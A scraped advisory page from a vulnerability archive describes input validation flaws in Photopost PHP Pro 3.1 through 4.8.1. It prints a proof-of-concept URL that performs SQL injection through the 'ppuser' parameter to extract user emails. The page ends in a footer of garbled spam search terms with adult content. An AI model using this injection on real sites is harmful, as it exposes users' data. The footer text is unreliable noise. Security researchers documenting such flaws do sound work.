about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , All Enthusiast Photopost PHP Pro Multiple Input Validation Vulnerabilities


Title All Enthusiast Photopost PHP Pro Multiple Input Validation Vulnerabilities
Published 2004-03-29-12:00AM
Updated 2005-01-04-05:39PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to JeiAr <security@gulftech.org>.
Vulnerable  All Enthusiast Inc Photopost PHP Pro 4.8.1
All Enthusiast Inc Photopost PHP Pro 4.6
All Enthusiast Inc Photopost PHP Pro 4.1
All Enthusiast Inc Photopost PHP Pro 4.0
All Enthusiast Inc Photopost PHP Pro 3.3
All Enthusiast Inc Photopost PHP Pro 3.2
All Enthusiast Inc Photopost PHP Pro 3.1
Not Vulnerable  
Code   No exploit is required to carry out a successful attack.

The following proof of concept example to exploit the SQL injection issue in 'ppuser' parameter is available:

http://www.example.com/showgallery.php?ppuser=-2'%20UNION%20SELECT%200,email,
0,0,0,0,0,0%20FROM%20user%20WHERE%20userid='1&cat=500
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 21:15:08 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
world sex xxxnudePho Picofpussy free 3gpBp news for c assima sex video sex.free.c news for c IIS 5.0 secur r54shell lo988l 075517.cn teesha www.stylo. 6.cfdsj.cn www.skywx. WWW.CLAYWO Spy Cam Na www.638587 sahba t651t Chetcpassw jooml CMS is Fre vidiosexxx INDINSEX.. Esha Sabdrimer vbadvanced news for c www.bl027. show pictu oyun sexbedroom allahabads www.desi m www.townme bbs.bblzws dfsfsdfsdf t756t Animations Crafty Syn www.nagnga yibaidu.5d Www//sexy a...ree8.c php-nuke 2 Xxxl danlo